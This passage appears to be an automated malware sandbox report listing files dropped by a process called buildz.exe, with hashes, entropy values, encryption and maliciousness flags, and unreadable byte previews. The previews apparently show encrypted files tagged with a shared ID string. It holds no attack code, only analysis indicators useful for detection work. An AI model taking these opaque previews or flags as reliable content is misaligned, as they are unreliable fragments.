                        SSDEEP:12:9DmHn4ZeZXDK+GaDVejJ+VykbPi6CO+900YIOqupn26Gcii9a:9KHueFDKaDVejJgZbPyAkOqyGbD
                        MD5:13007B07B5AD6D49A906275A4AABD567
                        SHA1:3989BFC237EE2F6493C763A6C324F2B44C8338C2
                        SHA-256:9BE0171F9BFE95A6ABED805FABC700F676B6B9752614DF5C55616F9D99CDFD27
                        SHA-512:21FB88496D53C8831630F1C3CE9C5188EAC5ED45CA8FD3CAC54054DCD8F991738C3BD29A1EA07D6C60A9EE8DFB1173DEA51F0DCB367FBFB1BACDDDABFCD03C8E
                        Malicious:false
                        Preview:{.. (. .z.D..|5:.QG..v^....m.(.aAvG..x .W...[g..m\k.RXX~.....U.(".....F..Pmj..s..hH.V..3n5.86X..=.olDw5..+..x.. .........{.D.I.,@..h....h..........*.R.S5\z%.?..=...'.m.4VX....4G...l...m.l.l..?#x..k...z+...Y....2...G5&hUD.......9..|}/.CF...pcK%.\ugk...~.f.n`t.....l...-d.Y!.&c.P{.5\N@. -:.V....|...D..Kn...c....A.'b..gYe...\a(G..23.t-*r.Fz.....:.YEEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):33102
                        Entropy (8bit):7.9944638213608386
                        Encrypted:true
                        SSDEEP:768:bBSDhUs8xplxIJ/BYJN6SpQ20S20kADwKkMB748NYELA:bGis8PlWYi8pkGm+A
                        MD5:AE1A668178E119E99992F26214C23CD5
                        SHA1:5CB1FCCFEE1B7281D49A93F103BF7223B98181A3
                        SHA-256:3B63EC4C3CF1CFFBD91397B59EFB1271FDBA55CF85A209A87356265134C10F09
                        SHA-512:91A91D5EB988E770CE65CA36E03D0839FF9E0E669C326B5941323D6FF0C13804375C1F14CCAC0603A1D8E773D8A5E3B46984DF2A3BB524359501C7938C5157BC
                        Malicious:true
                        Preview:SQLit$u1....&y.....r..e....k....U'.Id..*.....D..7.&C...D.K.8.........:. ...MP...g.X%.g@.J..4.....v..x{....eaj....]...B...........G.A.u1....04..\|.Q....+d.5&..%!C........."..)..".....V...1gZ..]}....[.'.4j.';.@./...799q...ysa...i......(....$'c....e.T...4.y.%){.H.=.'}.E.#.-...6E&...5.~....h..'..C..........p.m.F].......$.\!.Z.%..t.....EA......t..U.P..n.....3...i.g..(F........!9..V..6..Z.b..*X.g$%..u.Y..U0:..V./~.r.z.2..).g^.(.....>P*..$..S..xo$Q..z..%.....[:}.q%Y i.k...>.6a.!. ..;a[.(+@....V...d..,A...P..9.G.uw.6.-Ltz)...\.K..c.ye.D-.H.0.H..`...;........,~w.x>\..P..S@X.9.8/9.4F.)..qg[.q...B..".\@..;}..a..|s.k/....7*..T..+......P.....n..._'..5..&@... .E.T...N.c..u...!...J......b.G...Ff.....2+>......jf....:3..#/...^..!...1.y...#.../..+.rq...P8v..>_..!.~6..$}.[i9.J4...Su.0J...5x..U....<.h:..+.A.U.&l....`:...q...Az...K<..da.6...U.....Q...2P.E....o.....f].(..b.g..D...I..n4.........P.c.s.'..Q....5.6..a..O..(...).....d......).I..$....C...l...,...T.c5.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20814
                        Entropy (8bit):7.989339475953981
                        Encrypted:false
                        SSDEEP:384:WchKMGzQS80zZDVWoN/ki/l9z4aHQyEu4lhMle4WY5y1W21+Sf18mFR3OxA:WchKM+XpVVNMi/lud5u4EAQ4f18mFgxA
                        MD5:D68F5E197AAAE61E602940E2B8070227
                        SHA1:F2FDC353F463A141108133B903CCE568D7FEB891
                        SHA-256:EC9355E20459AF548A3A269B355F7198D6A2483990252503194CB4C1375B09C8
                        SHA-512:1BDF4CB8D3515FA4C55B2B54E757E1A87D2CBE65CC4D8B1E27A3E8A1B681FF0E50751FF00086C212525DB2A46D89735F302BDA90A680F0F6783D22A0E0FB447C
                        Malicious:false
                        Preview:SQLit...g./m..*....Y/../F.O.,(/....4...mp..B..JY..E,.@U...M.j......U...s+.:.6...,J...[..A.=..7.....`.t`)...~....^.A([@....R .|."!/:.m.Fp].vl.mOw..bS.V..."N..L....+.3[..>....&.JTD+r.EpA?Q(:2(.R...i.#.b..A....O.......s2.w$.w..."....Q...U.kO...U...W.6 .{y.8..eUK..vP.R....f)...:c..m........k.#..h.U.u.^...Bu..}..l....CT. ..a.....(.Y2.I!...x.5OXOW....A;dc..\/@.N:. ..C..4.\@.p....4.L..g....hj|O.....[lU.d...uw..1v.W] ..b.[.w.:...t.\Y..7...i......../e..E.#?....`...+[EY...Y.(u.P.k....|...9:..o{$...@jg...k!.2 .....J.......V.%......`(.Y.J.-+]....9f....?&A.......$>.....[.eC.-...rK..L'.m&~...................TL..(.:.....4..o0W.v.K4..../.n.f..~Xz.f..... F.`s...KB...X.Lm.?.k0.A?...?n.6,.Bj2F.@..EK..i`T+....w......Nz..ELS....I....&s.......s...X.I..9.../.....Y.y..P.u|...2F..v......?....oU.+FE...t.d)eh.....8H..(..Cj.J$z....6..h.....X...Dic....k....=. ...L5w.:.T.^.Lb.....VZ...h.].?..J.vKv.?.6.p...0..FD..F...F..r..4.gAcn....XO.De..A!1.....#a.o.3.@...d#.l..t
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):543
                        Entropy (8bit):7.501355748348725
                        Encrypted:false
                        SSDEEP:12:qmHBSnnxKijA+tw80jH2gPvRN4U5zOI2deLVG9MaJf1eTz/26Gcii9a:DBCnxK7+tw8GHvZNDRs6Gpxc/HGbD
                        MD5:66DFAD2AA1234CC12C7ADB45DCD81814
                        SHA1:C9894EFD8B87F946D26224873C7DCA7750E0F9C1
                        SHA-256:9828F2CD229C6A4AA9ABEF08F4701C518B5073D1DE69C473C8DC440C706ED828
                        SHA-512:7DDCBEE375F9A0ABD4C131C24AB70B66F9C0D23EDBE90D891F7B1C25184186F073FD984CDC449E850DE0A3863FE89AE8977F695B45F8A9828A19DC59F5A184D0
                        Malicious:false
                        Preview:.f.5..4...2...7u....)..O..dt..)wRP.ZI.<..K|.i.W........4C......u>a.u..(p.*Q.n9H....SQ5...f..cT.ia.....R#6....#R.zw6U.$...v...A..W....U.........7$..H.<.x;.Do|.:..Tr.0..).ub.. .C..W.a....%.q>..<8*......B....-.~g.d.q..0#D]..(..=.MX..~x......E....B$Lo...R..Fl.#.>..*.t#.bT.7L...9p..c.{91*_.,...[...l).9....f.@.....d.-.......G..Y..8.P.;.-.a.{{ky-..:r..M..?...[h...FC..@..j.NMns..sB...vH........jr.oL?...K.7ub.......2m....L:.v...bRch...;.k.Z..K.0..ed.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):617
                        Entropy (8bit):7.58784896245128
                        Encrypted:false
                        SSDEEP:12:kgY9u5bNuBc67LlI/Sh9pBvYuqqlOkGE68w26Gcii9a:BY9kbN1675IUCuqqlOkuDGbD
                        MD5:4EA14E010DF72FCAF8A1A03E2104C0AD
                        SHA1:B01EBE35ED509939BBFBA460162A25FB3736FF2F
                        SHA-256:A3E16DF8161E3108CEAD8D53CD60A8861A9604EADBE3AC256971FF99E5A294AC
                        SHA-512:45C18AD366C6D59183BA7F721E6ECED5A06D4579ED0165799C46A8812871590462554609A32D8A4CA832543D58402E162C850768949B3E9CB7DE3749D6B6297E
                        Malicious:false
                        Preview:2023/x...f.I..f.H...!B... ...#XD...`..h.....v.O..V.G.q.....&,.{.....z.?9..@6....y.}. wH....&......{.s...10..9...r.<G.W!"..&..r...)..r9.I>...%.a.(...q...'P@..C..)...G.a..[..'.K....S1...U.T#.4..4.......a.i......N......m..26...>.5...>+...+kr"..U.[.@._.....[......+V.LaP[w.TG..*S...d$..5.S.[..L?.8.Az.].<.pEsw.J....P..#.I..m...MY.r.....p..N..lu.z#Pyp..aS.pc.....q.a.=<....9.`I.bB.Uh4;&dDA&R..l.U.pG.(..wZ...).[.H..#.i}:t...~.......F.#.?.h.yL.T......Fv..;;T.V.g....=.`.2.G#.....k.Can..@Q.(GQ/k..:$*...-.T .....w......C..X...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):543
                        Entropy (8bit):7.544456210857009
                        Encrypted:false
                        SSDEEP:12:q/ASyat9NZANS7yQnc6+11xGWkVBl7g8hogQHNi/26Gcii9a:4Pyat9nAU7rdSbJm7g8KgQHNMGbD
                        MD5:7BD356FD1928DD8A303705C33EB6EA63
                        SHA1:35F86349184D08FB2ED44674676B6F0D443B5C13
                        SHA-256:523C82CBE3DA16967C12AB298E44FDD5D5738D50FA7505F49F4E1C1697E483A8
                        SHA-512:2BE4321614E7FB7ECD44935D822693878F47F16EF0AE7FD4263CDA84667B901C105CA1787F61E81376243A5F6FDDBC01B0ECB87FCA5828D797BA9DF66377657B
                        Malicious:false
                        Preview:.f.5..@?/^...z..........W....nc^...%\...~../].@n...6...h..H.2R`.....s.}*.Nh.^.tm`...1..P...U~..[..Se....;N.T..w...-)....h.q...N2.......D.h.=.3..82%..A&..o.._/j.9. j.H.)..k.....M...ofz.=..R.6E+..#.Y..es.d....i&..V.Y..).).N..y..)..B.gtr...L..........;..$..^...[...O...-.!.C......f9.VT~.#...*.c^..w,]..2=p.Y.i. ..UQ....N. .i...b.....]....Q...8v7.O.?r...C_..t........zK.d..\.Iak[.......Q.......W&..1bT.n..=.$.11.w.r....Y.?.Q....^8.~.....~....5.4EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):621
                        Entropy (8bit):7.609166393526618
                        Encrypted:false
                        SSDEEP:12:kUGa4eSKb4o6R/Muy/FrRmvEKvmTzwWwklTnAIRSH32AVMyTX26Gcii9a:/Ga4eS/GuI5gvEBoWwwTnFSX2CrGbD
                        MD5:3F8E1C37C06CF97B97B4905FA0E2BAFA
                        SHA1:DE0C814FDA0E438FBFD476B0CBCF1B8520290035
                        SHA-256:11F44A8FF0FB79280B684B6785272D384B366734A76B363EF4151FF3C451002D
                        SHA-512:E6A42E6EB1A4829B304729CF12F940E2FF8390458897BE9C57B2E5207BA786CCB379306D54A30F1BAB156F61D4292D93094E7E4742B8F282B6FCFB34DBD8B0F9
                        Malicious:false
                        Preview:2023/..d.b...j...mc.[.DG.^BZ....o..0.Mq.....().r;.8+....G...x...$F}...$....>.vd.. OXE.^...S..ML.n.N..l.&..9....)...Je~2..G..'.U.g..Y.i.....s}..[...Q..'...BI..G..wO .. .)s..@q..mY".3.{.F...c.(..dE....Z.P......4.A.1...~f.).._5n.{....>&..L4~w'9R.1..R'C..0q...)mf.W....a1m....DG..7.._=T|T.y.....".~..t.;.~_.t6.i..l...^I,..<...!..W.q..p3 .j/.@..'...0.......%.z..."(<..h...*i1YB>.|.y.e.P.oE.N.E..rz.....c.)....`.........1J..e..g.1;7.....`.].....(.|^u.;..R.=..Uo...B...|..d...l=..R..._m.%ld7..003..$9te..o`...X...}....cVo..M..G.m.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):961
                        Entropy (8bit):7.766282089210872
                        Encrypted:false
                        SSDEEP:24:kakMJICz5Pl1VmH6dnPxIPdZBMY7AcbXYTa+AvGbD:b/GCz5Pl1cdjkTTaNUD
                        MD5:EFDB8B9E1AACD06449201F24B3FF337D
                        SHA1:B779A467BF1C136A3634BA48413037D43671C5A9
                        SHA-256:7C040CB60CD2EB4E1AD24654862A31860840DB42CEC79F9B933992F8DDE57A67
                        SHA-512:49AE9C9B45F77E09A72069B1FDC72399C0C8A12E4F5E1A5DEADD41C6818C1F72C482BC1D1B5AE49F9A644C411555D8D1B0EEB45DD86D4793E8B719D4467AF0C1
                        Malicious:false
                        Preview:.f.5.&pp@-...Z5.zrWs....9+......s.........j.+"..u6..X)#..,...L.....cBq.I."..E....a..|]5.......!.[v.d.Rz....hq......h.2%......23.c..`,..._.q.`.5#R......T...$..g...]N.U.=j3&...:.h.\.,.1....2;h..I|3P...l.....7s.....P.D2.v.....y.x..../..f.}~4kD|i`......._|....o..Eq?.).F..k.......$..MW..B.BY.....b/8....;..[.).Nr.....].......N.>B.Og..s......#!..L...H.1..hz0......(^..ATn.).......\.HQ.u..C.(.W.......=.x.O..>o.22\u,.....".5...c...!..H.~.<s.1..of..t........Rk...{...'.E......n.;...-.=u....'.....i(...;.(w.{...DwhD.AH.....V.......\D.1..I.Y...Z.8Bi.xCF..*a.:.0NX....];.(r......R.?F...<.....<....3.3..fE.kCm..z.S.\!J...F!.....)&.).L.*..W....<.|FK..~..7....6}......$.......ZL.b.%.P"....C.V..m..u.S..a5....U`..k...yX."U+?m.%v.FC....2.....H.....2x.[/..U.lqM.B.f.a.%k..6...R.R+.NH.~......2.. ".h..?Pw.rE.!..+.@.|...@!N)..M...\F..2..s\..<..^..(3B..r..<EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):655
                        Entropy (8bit):7.611824788597267
                        Encrypted:false
                        SSDEEP:12:kVTUCqEyGUPDJbFkonMCPCrJ+Zxfeeouu7aAfHnK1K8+T26Gcii9a:EhqEIrJuoMC6ehu7aA/KADGbD
                        MD5:6320872617254E972233C9FA68FF6DAC
                        SHA1:D90C962E0854D50BB5D5A6EE21093162D8E2F34B
                        SHA-256:0D93731318A0040A396D70EF1D7301827D6CE33750B88025B783F04138014D06
                        SHA-512:3BCC143276A2D12A51206512EDCF0EEC8B3F6A649A70D7782AE3BCE2F8B17B3EFE279B1F92BD2C0783428CED62FCC4B678FE9F6E7A144AFC4D669E032DA3CED6
                        Malicious:false
                        Preview:2023/.-.......Q.6..S=.....a!D.t..3.q..I..>...27.........<.n.s.....s..W/....a@J.:.+.x..__N(:.D...;.F..u(.\.<V....Y....7.oF.Q...c...A].B.h.R@!nU1T.....o..`...;.M.....t...V6.G>rc....r ...*+{..........H,.G.7...k.t.....?S....$.kJ....9....`..2.2.gw..KD'....[...D.x..l.x.....c.......JU....k...4m...}.......5..J.2...W.7V..Z.~..+..q...W.....N..5~P..W...j.I~.......L2*..w....b.4...l.~.}....,{.\.}.e.+8I..........%.....d..l./.'.Ie:.o..1"#.@.~=J..$|P2..z.GlX.`....X5.T..k........=)).. .%4H#1Y.6.=...S..o}.....Nj..^.6..*.s...m....uW..DI.wK.....P...-G2......f..,{<.g./.!EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5316
                        Entropy (8bit):7.963865017218223
                        Encrypted:false
                        SSDEEP:96:oa0j/TN+hT6xKY9eYNkaOHAFupC3P6iu2t4ARJpQAz+GWIsc1GkrWIG5ZaG5ZbA:aLTwtUKYjkaOYjuXWpf0IsdcG5ZaMbA
                        MD5:38CDC271ECDCD9C086F55E8AB558B39F
                        SHA1:38A976541706B20969B934134DF55B78EB8AD507
                        SHA-256:55AF70B5F38A4CB09577AF470705D32EEBA3D74F66CE9C74E5C5326FF8512B70
                        SHA-512:B79175476128EC4FC43A4F1DD56E6DFE9A6FAA519A7752D73234ED406D69A525D34E0521FBC9C2392487E14C5339D41C27E7CA747126EF689FE86B4616CF5A1E
                        Malicious:false
                        Preview:.PNG....UT.@E;......5.A.j..@W.E........io..GX.M..Wd...H..T."^....Xb...1.+....Pw.D."Z6.{...F..U.K....?...3[>.Z.. .$M.'.....o..3. HM#....J*.t...<v.J.....]..=.6...=...m"....qqr.-1q.+..:.OtS.jqPQRnk....}.]Zj.......#.U....^. 1.....;....).......d.f...L........N...........=........I......a..hTA..E..P.^.0....^..-m}R.g...v`..9{..G.1..^...q.l.........5LO..9...T......J.>.D..S....cQ{z...#..m..C.}Y.........R...6u.s.:` (<.tt'...iaW+. ..,...G.>7..N.W...CD.C.S..V..9Ns..D.3.C..^:...&.DM,........W...m.t.<..$.[..U.....} ..Q.k..${..F.m...4.......`..L.Su...#...'....,...3R.|&i%.7...<l.<...>WVPN..>Xy%;T.V.R.h.(...m..)..H....b...I+.Du....y..8.|..8..*)..m..s.R*...b.%.G.v.......)...9...K.._..1Q.......`.}..........n..P}PP..Uw...9............}7m._.}qe6.7y&...B..6x.1U.:..#..I...;.t..p.i..4....W.]13.7B..>.e..*.M..~......2.h.~.TWh........S...Nm.../1.`j...p....c.J.0MT.zc...x......*..S.ah.X.....9....v...-...U.{..X.-.....0kjK.!.?..3.$.........~<!$.W).1..V...IWx.f..&..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):18852
                        Entropy (8bit):7.9910241472415695
                        Encrypted:true
                        SSDEEP:384:f9/3pZV4bn+Zor0WgQGvw2KhvodFo4YGiooHNnMVXpD09o0iEBAT9A:f974korzanKhvoA4xiJHNnQpXpA
                        MD5:9F9003451F76E7C468FE2541401E55A3
                        SHA1:98E4CAFEC6E2D3750B964F58248E1162B5C4B4DC
                        SHA-256:4CD4B37212431F02BC7067F079941A43263EFEF0B217E3C676FA139B13A7DE8D
                        SHA-512:40DC2D62F2D83B6A3BFC5B61225C081219F297B869E49DC21A8580071259889715C58F0B086FAC8286EDC78B1E40D3CC7C686D57120535C750F5F61A27630883
                        Malicious:true
                        Preview:[{"de.>.o...p...{...@...3...[?.(JAg....^.-...;.W.20m...B..'.b...P...].G......,.ES_...R.........n..%}....-..W{,+@\.X..C.{.dn..'..."~O..#.....7..."9a....Mmj.,K.&....[...GY.a....N...@.fD._..U...K.~e.]->s..y@7..={..s.d|.>.9?0.Ef ......O...@.l....SM|v...cW..A.L........ ..b/.,_.....k~..\...M...|...D...(.v5.M=...7...hSR.a..s.f.. .Z..jJn.E..@.6..Si...B..P.:..Q4m@.Q......".q..p.x.~...s.....|.hOJ..5.Jr.v_v.W...^8.Y8C.H....P.~..a...K.A+Y.<...'...l.m......?.sxc..~0.Q._..).0r\....y.NWC..c.....c....c......".,v.:..&:.t.............+....M#.sF..f...8h.N.=].z.K...ES.A.[X..8..nJ.y.MLL.Dl.y.^!.OW..p.{.h*.....u<..7........,8.%.\.:.C.q..%..5/.e[........u.......9..=.eI.c(...I.&.z6.'..+..fR..C..s.....,qO.Z..9...}.vkT.e..([v.X../.+..k.uX.........oa.s.Ux.......+..F.)...^..j...v;<..m..T..`.k.....?.R;...$.tN..$....'...,i...u.D.V..C5......;....Z#X.WH7.".d..5.r.`.A1...A........Y.|.D...te}G...P....x.....[..m.Wv.X...$!;}.......3.i....#......n.......b.).^.e.N...f].{.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1188
                        Entropy (8bit):7.823877801267113
                        Encrypted:false
                        SSDEEP:24:lxSPe1Ew/UJh1f/DMTBHPLP05i4y4YFczZdUeqhBqjOGbwUgHQYRGbD:lxSiEw/UJh1EvLM5kFBhBSOYgwYRUD
                        MD5:E0BBFA0C3414A5C6C53E264A9A0D3C54
                        SHA1:A9B4EB67426A3CCAD059EB41E06314AA7FE9B0B0
                        SHA-256:CD2E9B2C43CF4DD3DDF498DAA7221C1413102564DE27651ACCF9B519EBC7D58D
                        SHA-512:B82629F70F323931BCA62B1FA48266BB0F2F1B271BA820F51A8B71FCA92A40B2F00DC4707F8B020294A005663651CB7B9E1C1A899A56F2103CACE46714FFD21E
                        Malicious:false
                        Preview:{. ".r.=O..>q.}Y...1..x..QG'.J.......gU.R...+. .7j8.. }.*_.o3..$g...H.H../.U..Gp..(.r.6.n...k....$.Qf.....K.8NBB.&..K>.L.....&}.7...CM%,....A.5kaP%@..l.-..UW..U..6nm..H..j.......L0M.N.Ax....v.r..........,...e..M2?...9....7n.:.....?..j].H!...G.7.:`.QX.78...s4=...K.....F...E.Gq..tj.=iO.._0..Q.0.RzH..9..c.M.......Q#(].M/.[dp.p.....J.vHo....\..V~.[p.t..>.F.T..<....K.A...6vo..2.K....7:.UHc>=D..........*.fp}.....D=....%.(.A.dE...6.H....J_.6...0.\\b.PC.M4)a..,.>L3.....6.)..c.._D.5GSX.....QR.....cIU...;......{.&x0.8..4.........:Si..[P}...."7.i..u.....x.^...U!}A|...t...G......T....6!.6.u....&...c..]..X_F*......#>.Ka.....m.S.q[......S......Sb]]kr/..D`....-.......[.$p......wl......pOh...d)....~....`x}6..P|p...,..T..."......l....:...P^.V....PWJ>.E.........f.zT4...Z}...[.a...>%?.}......6....&.JN._t..V..)....>#Wr.e.nj.h^....\n/.....4./*.[....~.".g..F.^.".R-5.aW[.N.f....Lr.w....q........;...9....7....2.d3w...mAd_ys......+.^.."*...R|.1x..`Z..Sb...PYr+l?.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):80603
                        Entropy (8bit):7.997582697316604
                        Encrypted:true
                        SSDEEP:1536:jK7uxVUAhNZmvwMCpn1H0BZBzP4zrlZlZ2p1LGaPydyioKXv+r5A:jDVLhGvwMgUBXM/P2p1Ldydy9Kf+r5A
                        MD5:C2AB96443C35BA55C781BA136954DC46
                        SHA1:867C25E8304EEC6C6679B22C36A01C95D1E5C7DC
                        SHA-256:14DD445A669F99897620CD06B999BA75679730D4A859AE753CA2813EE0E707A2
                        SHA-512:74FBCF8AE4EC957ED960F48B34A42A8E0A5E5CB12697EC8D25EA6F9A6AC7BBCB9F3867E662126134DE57309AF56387F1402B44FBB4D9A35066B7F13C8FB5CD7B
                        Malicious:true
                        Preview:/*.. =.y.=<w.d.`.i...J .....5t..J%.HD....i.. ..jX(a..%..m+.yiG.a.f(.f.d...d.z.)<._#.]X._...q........L..C1kC..VB}Hy....{v..T..q.FDP8/...dcn..u{.3..|........k.q3^.{.R...C...r(h..MJ.....%LK........l.u.....P.....vMf\[...Z....aI.D......tT.....g...g..J;.&...\...d..2...+F.3..:..$A$.sii..c...<.r.. Lr..J..ho2c{....Qi@'.8.tTk.ky.*...1.....]..Z^B.R....pn..K....6...s..p..,..g......8..... .g2).7.....9..^.ae.3..w.}/L..m.L....<D..)+S....^A.A2LQ.....y......tN...x...t.N.bn.4q].R.7.W..Y...I<..023....)...[...4.i.F...wO.J..Kj..........Q.2...x.V.$.j..>.h..........)..@./I... Eyy32../{.l..Ja..%......<9%.n...E..c.. y....U.YNi..8.i.~.+aC`...q..+...s.R.o6...k.f.#.1.N.....t.s.h.w.G...#......ox....p.L.Z..W...>..].Si..G#(JO..K..!v.T.....v..\..5L3.gv.....3-...t.......~.......Nn!.w.k}..0..2...l9e.....G}!....i................%:@kP.m..Cy.y3...M.....P.._..xC...4F5....F;.....)..J.wZ+. ..".8l..d../>.@..g0).......W.@...B..w-;.X.\....7.D....9..C....h.2.yM..H.....j.9(;....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2731
                        Entropy (8bit):7.934586376299252
                        Encrypted:false
                        SSDEEP:48:6YXE+gZ30FiFltCk+UOpkn/+rirkm6I0TShUegsHiQu1wZH9VHFpon6SUD:zQ+iFik+Uw8mer0mUe21wZdVHFpgJA
                        MD5:44625400E13F67514F55BAC09397E0FD
                        SHA1:06A348F4E8EE16AE5CACE965971ADC6771998AD8
                        SHA-256:3D0573E8EE8C9830F51D575CAFC25AB34F23B6AF16C408956CE992CEE61B703D
                        SHA-512:DCA3A6E92DBF98ABE8B27204F0C249FE9DD5D400A6344BAF742AE4A8FB99EE0698311AD2B448479384EA07EA9FD4E9E8BD84A1E1B63E03CAF6B85A8870517339
                        Malicious:false
                        Preview:{.. ..d....^..............)k....8.u._...t7.D..p....~s..vD.I.D...g.....y.q.^6.?..\.ZE.....s...Z..p..Y..j.Wb.....t......,HS.....!p....'.S.=.I.......&P.9}.f.....0.M...>W^....q=.......m..( oi?.......-.[.m..p.P Bb4?X9.(:.U....1..K.TXeqS...-h.3..E....rut@.&...>:.....d..4.7...j._..o.k...\.G\.rP.......{....~.....PT.)....XG...R..+.l?.SYm...zb.....4......6..n..}C....V.....SH.i.....pT...:b....t.......V.#...R:.B.&.U..U.....d:Z...7Yi....7.[.H.T..s.NIO..Bf^s..XJ;....)..v..19p...|.p....gq.(.....+Sr,R..'..B.;..;....}W....#....a?...i.....z_.'.6b....u.6.6J...... .....^..2... ...m.1..j......Y...x..eC......R.6B..xK...L...3....U...%(........|u......EuO.8...?.c....V.....m.7ZW.}.=..@..V......c..2h..&...d.Xs.l.u(E...?...S.U..s...m.bI\..r..0..D....=....j.0=....e..J.BJ...Be:....0./L.D..<&...+.4.2/.4`.-.I&..#..J'....K.!m0..)...!..j..{..6\.,.(.......c.M.,'.;a,aW..(..:.?#..Gf...'O.'#.H.....+%..)T.C....p."...A."...*..)..G.^?.ma..sU......].."+....>a..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):625
                        Entropy (8bit):7.671367311940391
                        Encrypted:false
                        SSDEEP:12:2PpyETc98KBPlhbA6WRwctY1YorskkIQP5w5YJ4/26Gcii9a:2zC9hA6OxYjs5wZHGbD
                        MD5:37D518EB442E3F14D9C4259A469091A9
                        SHA1:2F868013AFA7DF72BB1C93B3F0A159C63C6525F2
                        SHA-256:C854781A077C090A0AE220D7D31FACFCF47CB9813C26059B67A8D106990561C5
                        SHA-512:DCF90D6761D63626492FCF94B64E6D12D7B6F342B43F43E5075A0D7DD6DE93373B260BA69C68EA157F15CCB79A591BF75CDC99443B5D03438D9F39160A463B5D
                        Malicious:false
                        Preview:(func.("z.......dw6.c.P.z......w..'~..Oo..j.v..#.;.....Op....w*..N.S...y..d...N.'..).....Nt....$....ti5.......wB..s.O.. e.#...JM/......[..\..L.....J?M..L.P>....g...k.(8...j\..cp...t.uh5.l..9.........m<:y.+f...,........H...D%.'2.%.]@hM[..QVW.u.m....U7......e....,.:-...2W.......n..I....t.[.~.."3f..k.j#..=.X7..\9........ v.=....C..i.Cg..}........1..[?.K.A.....7@..Bk.Y.. {..<...Z.,.T..!5(*8...$rW+:.ij.2..Uh.\.F..N...<1.......u.{].+.....RFd.k,.....ZYY.K.%..4.O..6.dj..;....y...DKl`8...&.N.%...........g..]g...:_P.1.a.VEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):763
                        Entropy (8bit):7.697405054964673
                        Encrypted:false
                        SSDEEP:12:Yk6WR6nP979RjJUOWI/+2SuzQLGS0mSImrJkIwLaDeHLYIOEVsK8PT+426Gcii9a:Y/P979Rja5kIqSFmrBXeHLfOcsK8VGbD
                        MD5:F68FDDB13FDB5A80D817CF824190F436
                        SHA1:1EEEAAFDB2DCDE0D0F4C98D23ABEC6E75156E55E
                        SHA-256:10DA58F52443BE13E607D6CB2F26E5920009E75FA73F08BF225910F39CC1CD7A
                        SHA-512:6FF16C16254935743AA9CFECB804D52760D9439F295D57DACD1AB36A5D363C7E67AFB2359C42E14C80FAC34E0043AE0D43A683D7EAB80E432E8F9B15E2CFB064
                        Malicious:false
                        Preview:{"fil.E&Y..U.......yZ...~.`..q"...@5.......E ..}6q......K.%g3...'.....U(.........1....y....#C$....(........9h..A.&...m^........g......../.I~...Y......U....8...Br. *........t.t..r..YNS..}.: n.\[V....3o..U..)^B7..k..ywA...~h.........{?...B'....N..X...n.@9.../......].-J...7.U.WD..,$sen..\..5E......U..&.....a.b.<.UL....R0....Q...[^...!9.0....9.u.i.!*.k......+...x1....n.j34...oc.1.*27$...l.z.Lt..y..N%Q..p.....F..b.....<fh.N..9d;H..G?....Q....._......h.|....<...{.02.w..+.j.S.......n..u(....O..y2........1$.>..........S.u/.AR#.].ipU..q...Cp.Y,e..W..s...k.'\..|q<. ..E..s.RG3.."...........".......t;.......Jm..Y.q..>...T...Z'.f..-.q..*od...y...0V..7}S.;.[EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2087
                        Entropy (8bit):7.907579542287976
                        Encrypted:false
                        SSDEEP:48:UZckXJ6hvCxt1JcUvwsGYkl8ckf1X3pmC12o4C/+SBUD:URZ6VCxt7crJYklbmvh4l0A
                        MD5:BDD779DBCE4A92DAFBBD10D216D69441
                        SHA1:FEFA1DF8D0A1F38666CE4A5228E9D88AB8FA3CA7
                        SHA-256:493544EFD415F32372C84C2FDE79B806F7DC51532A15B8478D983FC66A827EB0
                        SHA-512:BE312942EB46D9C03AC8DDD095AF1CD0A3C51E89A8B259EEB77D007D9F5E6DE7C3F76674F0A961F18878E49F1266212E61FFC71F40497B02377D83D5EB79E084
                        Malicious:false
